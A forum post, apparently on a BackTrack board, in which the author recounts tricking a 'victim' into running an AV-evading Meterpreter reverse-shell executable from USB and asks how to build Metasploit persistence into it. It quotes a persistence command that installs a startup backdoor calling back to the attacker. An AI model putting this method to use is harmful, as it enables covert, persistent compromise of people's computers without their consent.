Dear fellow Backtrackers,
I hope someone knows the answer to my question:
Is it possible to integrate metasploits persistence module into an executable that includes a meterpreter reverse_tcp payload? So that it establishes a meterpreter-session when executed AND installs a backdoor to startup on system-start again?
I successfully social engineered my "victim" to run an example.exe from an usb drive, that included the meterpreter payload and was self-encoded in a way the AV didn't detect it. My Backtrack-machine was part of the local network and listening for the incoming meterpreter-session, which it established once the example.exe got excecuted. But: The situation required me to stay with the person running the "victim"-machine for a long time, and when I got back to Backtrack, the session was already closed because the "victim"-machine was shut down.
If the session was still up, I had used
to achieve persistence on the machine, so that it would connect back to me when the computer gets started again. But since I had no chance to run the code, because of the system being shut down before I got back to the meterpreter-session, the test failed. That's why I ask if there's a way to include persistence in the .exe, to save the time I would need to run the persistence code in my meterpreter-session.
run persistence -A -X -i [time in secs] -p [open port]
I'm looking forward to your tips,